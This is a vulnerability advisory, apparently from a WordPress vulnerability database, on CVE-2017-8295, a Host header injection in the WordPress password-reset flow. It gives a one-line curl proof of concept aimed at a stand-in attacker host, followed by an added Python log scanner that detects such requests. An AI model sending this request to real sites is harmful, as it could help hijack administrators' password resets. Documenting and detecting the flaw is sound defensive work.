WordPress 2.3-4.8.3 - Host Header Injection in Password Reset



Description
An attacker may be able to set the 'From' email header in password reset emails by supplying a crafted Host header in the reset request.
Proof of Concept
curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" "http://example.com/wp-login.php?action=lostpassword"
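
A defensive check built on the proof of concept above, as an added example that is not part of the original advisory: it scans web access logs for POSTs to wp-login.php?action=lostpassword whose Host header is not one of the site's own names. The log layout (combined format with host="..." appended), the allowlist and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed access-log layout (not from the advisory): the combined format
# with the request's Host header appended as host="...".
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ host="(?P<host>[^"]*)"'
)

def normalise_host(value):
    """Lower-case, drop any :port suffix and a trailing dot."""
    host = value.strip().lower()
    if host.startswith("["):            # bracketed IPv6 literal
        host = host.split("]")[0] + "]"
    else:
        host = host.split(":")[0]
    return host.rstrip(".")

def is_reset_request(method, target):
    """True for POST /wp-login.php?action=lostpassword, as in the PoC."""
    parts = urlsplit(target)
    if method != "POST" or not parts.path.endswith("/wp-login.php"):
        return False
    return "lostpassword" in parse_qs(parts.query).get("action", [])

def find_suspicious_resets(lines, allowed_hosts):
    """Return (ip, host) for reset requests whose Host is not allowlisted."""
    allowed = {normalise_host(h) for h in allowed_hosts}
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not is_reset_request(m["method"], m["target"]):
            continue
        host = normalise_host(m["host"])
        if host not in allowed:
            hits.append((m["ip"], host))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.4 - - [03/May/2017:10:00:01 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 512 host="example.com"',
    '203.0.113.7 - - [03/May/2017:10:00:05 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 512 host="www.evil.com"',
    '198.51.100.9 - - [03/May/2017:10:00:09 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 512 host="EXAMPLE.com:80"',
    '203.0.113.7 - - [03/May/2017:10:00:12 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 900 host="www.evil.com"',
]
```

A reset request that carries the action only in the POST body is not visible in an access log, so this check covers the query-string form used in the proof of concept.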

Affects WordPresses

no known fix

References

CVE 2017-8295
URL https://core.trac.wordpress.org/ticket/25239
URL https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
URL https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html

Classification

Type UNKNOWN

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter dewhurstsec
Views 18802
Verified No
WPVDB ID 8807

Timeline

Publicly Published 2017-05-03
Added 2017-05-05
Last Updated 2019-11-01
